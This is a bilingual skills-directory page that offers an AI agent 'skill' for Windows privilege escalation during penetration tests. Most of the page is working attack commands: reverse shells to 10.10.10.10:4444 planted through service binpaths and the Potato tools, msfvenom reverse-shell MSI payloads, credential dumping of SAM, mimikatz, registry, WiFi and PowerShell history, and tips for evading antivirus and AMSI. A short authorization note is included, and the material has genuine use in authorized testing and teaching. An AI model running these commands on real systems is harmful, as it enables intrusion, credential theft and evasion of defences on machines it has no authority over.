Windows权限提升指南：渗透测试中系统枚举、漏洞利用与安全加固方法

Windows Privilege Escalation by zebbern/claude-code-guide

3,800 GitHub Stars

GitHub

安装命令

npx skills add https://github.com/zebbern/claude-code-guide --skill 'Windows Privilege Escalation'

系统架构测试安全

🇨🇳中文介绍

Windows 权限提升

目的

在渗透测试任务中，提供系统性的方法来发现和利用 Windows 系统上的权限提升漏洞。本技能涵盖系统枚举、凭据收集、服务利用、令牌模拟、内核漏洞利用以及各种可能导致从标准用户权限提升至管理员或 SYSTEM 权限的错误配置。

输入 / 先决条件

初始访问 : 在 Windows 系统上以标准用户身份获得 Shell 或 RDP 访问权限
枚举工具 : WinPEAS、PowerUp、Seatbelt 或手动命令
漏洞利用二进制文件 : 预编译的漏洞利用程序或传输工具的能力
知识 : 理解 Windows 安全模型和权限
授权 : 进行渗透测试活动的书面许可

输出 / 交付成果

权限提升路径 : 识别出的通往更高权限的途径
凭据转储 : 收集到的密码、哈希值或令牌
提升的 Shell : 以管理员或 SYSTEM 权限执行命令
漏洞报告 : 错误配置和漏洞利用的文档记录
修复建议 : 针对已识别弱点的修复方案

核心工作流程

1. 系统枚举

基本系统信息

# OS version and patches
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic qfe

# Architecture
wmic os get osarchitecture
echo %PROCESSOR_ARCHITECTURE%

# Environment variables
set
Get-ChildItem Env: | ft Key,Value

# List drives
wmic logicaldisk get caption,description,providername

广告位招租

在这里展示您的产品或服务

触达数万 AI 开发者，精准高效

联系我们

相关 Skills

Azure RBAC 权限管理工具：查找最小角色、创建自定义角色与自动化分配

117,000 周安装

OpenClaw 安全 Linux 云部署指南：私有优先、SSH隧道、Podman容器化

31,600 周安装

Linux云主机安全托管指南：从SSH加固到HTTPS部署

31,600 周安装

Better Auth 最佳实践指南：集成、配置与安全设置完整教程

30,700 周安装

# Current user
whoami
echo %USERNAME%

# User privileges
whoami /priv
whoami /groups
whoami /all

# All users
net user
Get-LocalUser | ft Name,Enabled,LastLogon

# User details
net user administrator
net user %USERNAME%

# Local groups
net localgroup
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name,PrincipalSource

# Network interfaces
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

# Routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric

# ARP table
arp -A

# Active connections
netstat -ano

# Network shares
net share

# Domain Controllers
nltest /DCLIST:DomainName

防病毒软件枚举

# Check AV products
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

SAM 和 SYSTEM 文件

# SAM file locations
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM

# SYSTEM file locations
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

# Extract hashes (from Linux after obtaining files)
pwdump SYSTEM SAM > sam.txt
samdump2 SYSTEM SAM -o sam.txt

# Crack with John
john --format=NT sam.txt

HiveNightmare (CVE-2021-36934)

# Check vulnerability
icacls C:\Windows\System32\config\SAM
# Vulnerable if: BUILTIN\Users:(I)(RX)

# Exploit with mimikatz
mimikatz> token::whoami /full
mimikatz> misc::shadowcopies
mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

# Search file contents
findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config

# Search registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Windows Autologin credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

# PuTTY sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# VNC passwords
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

# Search for specific files
dir /S /B *pass*.txt == *pass*.xml == *cred* == *vnc* == *.config*
where /R C:\ *.ini

# Common locations
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

# Search for files
dir /s *sysprep.inf *sysprep.xml *unattend.xml 2>nul

# Decode base64 password (Linux)
echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d

# List profiles
netsh wlan show profile

# Get cleartext password
netsh wlan show profile <SSID> key=clear

# Extract all WiFi passwords
for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Key" | find /v "Number" & echo.) & @echo on

PowerShell 历史记录

# View PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

不正确的服务权限

# Find misconfigured services
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -ucqv <service_name>

# Look for: SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG

# Exploit vulnerable service
sc config <service> binpath= "C:\nc.exe -e cmd.exe 10.10.10.10 4444"
sc stop <service>
sc start <service>

未加引号的服务路径

# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\"
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Exploit: Place malicious exe in path
# For path: C:\Program Files\Some App\service.exe
# Try: C:\Program.exe or C:\Program Files\Some.exe

AlwaysInstallElevated

# Check if enabled
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Both must return 0x1 for vulnerability

# Create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o evil.msi

# Install (runs as SYSTEM)
msiexec /quiet /qn /i C:\evil.msi

# Look for these privileges
whoami /priv

# Exploitable privileges:
# SeImpersonatePrivilege
# SeAssignPrimaryTokenPrivilege
# SeTcbPrivilege
# SeBackupPrivilege
# SeRestorePrivilege
# SeCreateTokenPrivilege
# SeLoadDriverPrivilege
# SeTakeOwnershipPrivilege
# SeDebugPrivilege

# JuicyPotato (Windows Server 2019 and below)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.10.10 4444 -e cmd.exe" -t *

# PrintSpoofer (Windows 10 and Server 2019)
PrintSpoofer.exe -i -c cmd

# RoguePotato
RoguePotato.exe -r 10.10.10.10 -e "C:\nc.exe 10.10.10.10 4444 -e cmd.exe" -l 9999

# GodPotato
GodPotato.exe -cmd "cmd /c whoami"

5. 内核漏洞利用

# Use Windows Exploit Suggester
systeminfo > systeminfo.txt
python wes.py systeminfo.txt

# Or use Watson (on target)
Watson.exe

# Or use Sherlock PowerShell script
powershell.exe -ExecutionPolicy Bypass -File Sherlock.ps1

常见内核漏洞利用

MS17-010 (EternalBlue) - Windows 7/2008/2003/XP
MS16-032 - Secondary Logon Handle - 2008/7/8/10/2012
MS15-051 - Client Copy Image - 2003/2008/7
MS14-058 - TrackPopupMenu - 2003/2008/7/8.1
MS11-080 - afd.sys - XP/2003
MS10-015 - KiTrap0D - 2003/XP/2000
MS08-067 - NetAPI - 2000/XP/2003
CVE-2021-1732 - Win32k - Windows 10/Server 2019
CVE-2020-0796 - SMBGhost - Windows 10
CVE-2019-1388 - UAC Bypass - Windows 7/8/10/2008/2012/2016/2019

# Find missing DLLs with Process Monitor
# Filter: Result = NAME NOT FOUND, Path ends with .dll

# Compile malicious DLL
# For x64: x86_64-w64-mingw32-gcc windows_dll.c -shared -o evil.dll
# For x86: i686-w64-mingw32-gcc windows_dll.c -shared -o evil.dll

使用保存的凭据运行 Runas

# List saved credentials
cmdkey /list

# Use saved credentials
runas /savecred /user:Administrator "cmd.exe /k whoami"
runas /savecred /user:WORKGROUP\Administrator "\\10.10.10.10\share\evil.exe"

# Check for WSL
wsl whoami

# Set root as default user
wsl --default-user root
# Or: ubuntu.exe config --default-user root

# Spawn shell as root
wsl whoami
wsl python -c 'import os; os.system("/bin/bash")'

工具	命令	用途
WinPEAS	`winPEAS.exe`	综合枚举
PowerUp	`Invoke-AllChecks`	服务/路径漏洞
Seatbelt	`Seatbelt.exe -group=all`	安全检查
Watson	`Watson.exe`	缺失补丁
JAWS	`.\jaws-enum.ps1`	旧版 Windows 枚举
PrivescCheck	`Invoke-PrivescCheck`	权限提升检查

默认可写文件夹

C:\Windows\Temp
C:\Windows\Tasks
C:\Users\Public
C:\Windows\tracing
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys

常见权限提升途径

途径	检查命令
未加引号的路径	`wmic service get pathname
弱服务权限	`accesschk.exe -uwcqv "Everyone" *`
AlwaysInstallElevated	`reg query HKCU\...\Installer /v AlwaysInstallElevated`
存储的凭据	`cmdkey /list`
令牌权限	`whoami /priv`
计划任务	`schtasks /query /fo LIST /v`

模拟权限漏洞利用

权限	工具	用法
SeImpersonatePrivilege	JuicyPotato	CLSID 滥用
SeImpersonatePrivilege	PrintSpoofer	后台打印程序服务
SeImpersonatePrivilege	RoguePotato	OXID 解析器
SeBackupPrivilege	robocopy /b	读取受保护文件
SeRestorePrivilege	Enable-SeRestorePrivilege	写入受保护文件
SeTakeOwnershipPrivilege	takeown.exe	获取文件所有权

内核漏洞利用可能导致系统不稳定
某些漏洞利用需要特定的 Windows 版本
AV/EDR 可能检测并阻止常见工具
令牌模拟需要服务账户上下文
某些技术需要 GUI 访问

凭据转储会触发安全警报
服务修改会记录在事件日志中
PowerShell 执行可能被监控
AV 会检测已知的漏洞利用签名

仅测试获得书面授权的系统
记录所有提权尝试
避免干扰生产系统
通过适当渠道报告所有发现

示例 1：服务二进制路径利用

# Find vulnerable service
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# Result: RW MyService SERVICE_ALL_ACCESS

# Check current config
sc qc MyService

# Stop service and change binary path
sc stop MyService
sc config MyService binpath= "C:\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc start MyService

# Catch shell as SYSTEM

示例 2：AlwaysInstallElevated 利用

# Verify vulnerability
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both return: 0x1

# Generate payload (attacker machine)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o shell.msi

# Transfer and execute
msiexec /quiet /qn /i C:\Users\Public\shell.msi

# Catch SYSTEM shell

示例 3：JuicyPotato 令牌模拟

# Verify SeImpersonatePrivilege
whoami /priv
# SeImpersonatePrivilege Enabled

# Run JuicyPotato
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe 10.10.10.10 4444 -e cmd.exe" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

# Catch SYSTEM shell

示例 4：未加引号的服务路径

# Find unquoted path
wmic service get name,pathname | findstr /i /v """
# Result: C:\Program Files\Vuln App\service.exe

# Check write permissions
icacls "C:\Program Files\Vuln App"
# Result: Users:(W)

# Place malicious binary
copy C:\Users\Public\shell.exe "C:\Program Files\Vuln.exe"

# Restart service
sc stop "Vuln App"
sc start "Vuln App"

示例 5：从注册表收集凭据

# Check for auto-logon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# DefaultUserName: Administrator
# DefaultPassword: P@ssw0rd123

# Use credentials
runas /user:Administrator cmd.exe
# Or for remote: psexec \\target -u Administrator -p P@ssw0rd123 cmd

问题	原因	解决方案
漏洞利用失败（AV 检测）	AV 阻止已知漏洞利用	使用混淆的漏洞利用；无文件攻击（mshta, certutil）；自定义编译的二进制文件
服务无法启动	二进制路径语法错误	确保 binpath 中 `=` 后有空格：`binpath= "C:\path\binary.exe"`
令牌模拟失败	权限错误/版本不匹配	检查 `whoami /priv`；验证 Windows 版本兼容性
找不到内核漏洞利用	系统已打补丁	运行 Windows Exploit Suggester：`python wes.py systeminfo.txt`
PowerShell 被阻止	执行策略/AMSI	使用 `powershell -ep bypass -c "cmd"` 或 `-enc <base64>`

🇺🇸English

Windows Privilege Escalation

Purpose

Provide systematic methodologies for discovering and exploiting privilege escalation vulnerabilities on Windows systems during penetration testing engagements. This skill covers system enumeration, credential harvesting, service exploitation, token impersonation, kernel exploits, and various misconfigurations that enable escalation from standard user to Administrator or SYSTEM privileges.

Inputs / Prerequisites

Initial Access : Shell or RDP access as standard user on Windows system
Enumeration Tools : WinPEAS, PowerUp, Seatbelt, or manual commands
Exploit Binaries : Pre-compiled exploits or ability to transfer tools
Knowledge : Understanding of Windows security model and privileges
Authorization : Written permission for penetration testing activities

Outputs / Deliverables

Privilege Escalation Path : Identified vector to higher privileges
Credential Dump : Harvested passwords, hashes, or tokens
Elevated Shell : Command execution as Administrator or SYSTEM
Vulnerability Report : Documentation of misconfigurations and exploits
Remediation Recommendations : Fixes for identified weaknesses

Core Workflow

1. System Enumeration

Basic System Information

# OS version and patches
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic qfe

# Architecture
wmic os get osarchitecture
echo %PROCESSOR_ARCHITECTURE%

# Environment variables
set
Get-ChildItem Env: | ft Key,Value

# List drives
wmic logicaldisk get caption,description,providername

User Enumeration

# Current user
whoami
echo %USERNAME%

# User privileges
whoami /priv
whoami /groups
whoami /all

# All users
net user
Get-LocalUser | ft Name,Enabled,LastLogon

# User details
net user administrator
net user %USERNAME%

# Local groups
net localgroup
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name,PrincipalSource

Network Enumeration

# Network interfaces
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

# Routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric

# ARP table
arp -A

# Active connections
netstat -ano

# Network shares
net share

# Domain Controllers
nltest /DCLIST:DomainName

Antivirus Enumeration

# Check AV products
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

2. Credential Harvesting

SAM and SYSTEM Files

# SAM file locations
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM

# SYSTEM file locations
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

# Extract hashes (from Linux after obtaining files)
pwdump SYSTEM SAM > sam.txt
samdump2 SYSTEM SAM -o sam.txt

# Crack with John
john --format=NT sam.txt

HiveNightmare (CVE-2021-36934)

# Check vulnerability
icacls C:\Windows\System32\config\SAM
# Vulnerable if: BUILTIN\Users:(I)(RX)

# Exploit with mimikatz
mimikatz> token::whoami /full
mimikatz> misc::shadowcopies
mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

Search for Passwords

# Search file contents
findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config

# Search registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Windows Autologin credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

# PuTTY sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# VNC passwords
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

# Search for specific files
dir /S /B *pass*.txt == *pass*.xml == *cred* == *vnc* == *.config*
where /R C:\ *.ini

Unattend.xml Credentials

# Common locations
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

# Search for files
dir /s *sysprep.inf *sysprep.xml *unattend.xml 2>nul

# Decode base64 password (Linux)
echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d

WiFi Passwords

# List profiles
netsh wlan show profile

# Get cleartext password
netsh wlan show profile <SSID> key=clear

# Extract all WiFi passwords
for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Key" | find /v "Number" & echo.) & @echo on

PowerShell History

# View PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

3. Service Exploitation

Incorrect Service Permissions

# Find misconfigured services
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -ucqv <service_name>

# Look for: SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG

# Exploit vulnerable service
sc config <service> binpath= "C:\nc.exe -e cmd.exe 10.10.10.10 4444"
sc stop <service>
sc start <service>

Unquoted Service Paths

# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\"
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Exploit: Place malicious exe in path
# For path: C:\Program Files\Some App\service.exe
# Try: C:\Program.exe or C:\Program Files\Some.exe

AlwaysInstallElevated

# Check if enabled
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Both must return 0x1 for vulnerability

# Create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o evil.msi

# Install (runs as SYSTEM)
msiexec /quiet /qn /i C:\evil.msi

4. Token Impersonation

Check Impersonation Privileges

# Look for these privileges
whoami /priv

# Exploitable privileges:
# SeImpersonatePrivilege
# SeAssignPrimaryTokenPrivilege
# SeTcbPrivilege
# SeBackupPrivilege
# SeRestorePrivilege
# SeCreateTokenPrivilege
# SeLoadDriverPrivilege
# SeTakeOwnershipPrivilege
# SeDebugPrivilege

Potato Attacks

# JuicyPotato (Windows Server 2019 and below)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.10.10 4444 -e cmd.exe" -t *

# PrintSpoofer (Windows 10 and Server 2019)
PrintSpoofer.exe -i -c cmd

# RoguePotato
RoguePotato.exe -r 10.10.10.10 -e "C:\nc.exe 10.10.10.10 4444 -e cmd.exe" -l 9999

# GodPotato
GodPotato.exe -cmd "cmd /c whoami"

5. Kernel Exploitation

Find Kernel Vulnerabilities

# Use Windows Exploit Suggester
systeminfo > systeminfo.txt
python wes.py systeminfo.txt

# Or use Watson (on target)
Watson.exe

# Or use Sherlock PowerShell script
powershell.exe -ExecutionPolicy Bypass -File Sherlock.ps1

Common Kernel Exploits

MS17-010 (EternalBlue) - Windows 7/2008/2003/XP
MS16-032 - Secondary Logon Handle - 2008/7/8/10/2012
MS15-051 - Client Copy Image - 2003/2008/7
MS14-058 - TrackPopupMenu - 2003/2008/7/8.1
MS11-080 - afd.sys - XP/2003
MS10-015 - KiTrap0D - 2003/XP/2000
MS08-067 - NetAPI - 2000/XP/2003
CVE-2021-1732 - Win32k - Windows 10/Server 2019
CVE-2020-0796 - SMBGhost - Windows 10
CVE-2019-1388 - UAC Bypass - Windows 7/8/10/2008/2012/2016/2019

6. Additional Techniques

DLL Hijacking

# Find missing DLLs with Process Monitor
# Filter: Result = NAME NOT FOUND, Path ends with .dll

# Compile malicious DLL
# For x64: x86_64-w64-mingw32-gcc windows_dll.c -shared -o evil.dll
# For x86: i686-w64-mingw32-gcc windows_dll.c -shared -o evil.dll

Runas with Saved Credentials

# List saved credentials
cmdkey /list

# Use saved credentials
runas /savecred /user:Administrator "cmd.exe /k whoami"
runas /savecred /user:WORKGROUP\Administrator "\\10.10.10.10\share\evil.exe"

WSL Exploitation

# Check for WSL
wsl whoami

# Set root as default user
wsl --default-user root
# Or: ubuntu.exe config --default-user root

# Spawn shell as root
wsl whoami
wsl python -c 'import os; os.system("/bin/bash")'

Quick Reference

Enumeration Tools

Tool	Command	Purpose
WinPEAS	`winPEAS.exe`	Comprehensive enumeration
PowerUp	`Invoke-AllChecks`	Service/path vulnerabilities
Seatbelt	`Seatbelt.exe -group=all`	Security audit checks
Watson	`Watson.exe`	Missing patches
JAWS	`.\jaws-enum.ps1`

Default Writable Folders

C:\Windows\Temp
C:\Windows\Tasks
C:\Users\Public
C:\Windows\tracing
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys

Common Privilege Escalation Vectors

Vector	Check Command
Unquoted paths	`wmic service get pathname
Weak service perms	`accesschk.exe -uwcqv "Everyone" *`
AlwaysInstallElevated	`reg query HKCU\...\Installer /v AlwaysInstallElevated`
Stored credentials	`cmdkey /list`
Token privileges	`whoami /priv`
Scheduled tasks	`schtasks /query /fo LIST /v`

Impersonation Privilege Exploits

Privilege	Tool	Usage
SeImpersonatePrivilege	JuicyPotato	CLSID abuse
SeImpersonatePrivilege	PrintSpoofer	Spooler service
SeImpersonatePrivilege	RoguePotato	OXID resolver
SeBackupPrivilege	robocopy /b	Read protected files
SeRestorePrivilege	Enable-SeRestorePrivilege	Write protected files
SeTakeOwnershipPrivilege	takeown.exe	Take file ownership

Constraints and Limitations

Operational Boundaries

Kernel exploits may cause system instability
Some exploits require specific Windows versions
AV/EDR may detect and block common tools
Token impersonation requires service account context
Some techniques require GUI access

Detection Considerations

Credential dumping triggers security alerts
Service modification logged in Event Logs
PowerShell execution may be monitored
Known exploit signatures detected by AV

Legal Requirements

Only test systems with written authorization
Document all escalation attempts
Avoid disrupting production systems
Report all findings through proper channels

Examples

Example 1: Service Binary Path Exploitation

# Find vulnerable service
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# Result: RW MyService SERVICE_ALL_ACCESS

# Check current config
sc qc MyService

# Stop service and change binary path
sc stop MyService
sc config MyService binpath= "C:\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc start MyService

# Catch shell as SYSTEM

Example 2: AlwaysInstallElevated Exploitation

# Verify vulnerability
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both return: 0x1

# Generate payload (attacker machine)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o shell.msi

# Transfer and execute
msiexec /quiet /qn /i C:\Users\Public\shell.msi

# Catch SYSTEM shell

Example 3: JuicyPotato Token Impersonation

# Verify SeImpersonatePrivilege
whoami /priv
# SeImpersonatePrivilege Enabled

# Run JuicyPotato
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe 10.10.10.10 4444 -e cmd.exe" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

# Catch SYSTEM shell

Example 4: Unquoted Service Path

# Find unquoted path
wmic service get name,pathname | findstr /i /v """
# Result: C:\Program Files\Vuln App\service.exe

# Check write permissions
icacls "C:\Program Files\Vuln App"
# Result: Users:(W)

# Place malicious binary
copy C:\Users\Public\shell.exe "C:\Program Files\Vuln.exe"

# Restart service
sc stop "Vuln App"
sc start "Vuln App"

Example 5: Credential Harvesting from Registry

# Check for auto-logon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# DefaultUserName: Administrator
# DefaultPassword: P@ssw0rd123

# Use credentials
runas /user:Administrator cmd.exe
# Or for remote: psexec \\target -u Administrator -p P@ssw0rd123 cmd

Troubleshooting

Issue	Cause	Solution
Exploit fails (AV detected)	AV blocking known exploits	Use obfuscated exploits; living-off-the-land (mshta, certutil); custom compiled binaries
Service won't start	Binary path syntax	Ensure space after `=` in binpath: `binpath= "C:\path\binary.exe"`
Token impersonation fails	Wrong privilege/version	Check `whoami /priv`; verify Windows version compatibility
Can't find kernel exploit	System patched	Run Windows Exploit Suggester: `python wes.py systeminfo.txt`
PowerShell blocked	Execution policy/AMSI

Weekly Installs

–

Repository

zebbern/claude-…de-guide

GitHub Stars

3.8K

First Seen

–

Security Audits

Gen Agent Trust HubPass SocketFail SnykFail

xdrop 文件传输脚本：Bun 环境下安全上传下载工具，支持加密分享

28,800 周安装

Windows权限提升指南：渗透测试中系统枚举、漏洞利用与安全加固方法

🇨🇳中文介绍

Windows 权限提升

目的

输入 / 先决条件

输出 / 交付成果

核心工作流程

1. 系统枚举

基本系统信息

相关 Skills

用户枚举

网络枚举

防病毒软件枚举

2. 凭据收集

SAM 和 SYSTEM 文件

HiveNightmare (CVE-2021-36934)

搜索密码

Unattend.xml 凭据

WiFi 密码

PowerShell 历史记录

3. 服务利用

不正确的服务权限

未加引号的服务路径

AlwaysInstallElevated

4. 令牌模拟

检查模拟权限

Potato 攻击

5. 内核漏洞利用

查找内核漏洞

常见内核漏洞利用

6. 其他技术

DLL 劫持

使用保存的凭据运行 Runas

WSL 利用

快速参考

枚举工具

默认可写文件夹

常见权限提升途径

模拟权限漏洞利用

约束与限制

操作边界

检测注意事项

法律要求

示例

示例 1：服务二进制路径利用

示例 2：AlwaysInstallElevated 利用

示例 3：JuicyPotato 令牌模拟

示例 4：未加引号的服务路径

示例 5：从注册表收集凭据

故障排除

🇺🇸English

Windows Privilege Escalation

Purpose

Inputs / Prerequisites

Outputs / Deliverables

Core Workflow

1. System Enumeration

Basic System Information

User Enumeration

Network Enumeration

Antivirus Enumeration

2. Credential Harvesting

SAM and SYSTEM Files

HiveNightmare (CVE-2021-36934)

Search for Passwords

Unattend.xml Credentials

WiFi Passwords

PowerShell History

3. Service Exploitation

Incorrect Service Permissions

Unquoted Service Paths

AlwaysInstallElevated

4. Token Impersonation

Check Impersonation Privileges

Potato Attacks

5. Kernel Exploitation

Find Kernel Vulnerabilities

Common Kernel Exploits

6. Additional Techniques

DLL Hijacking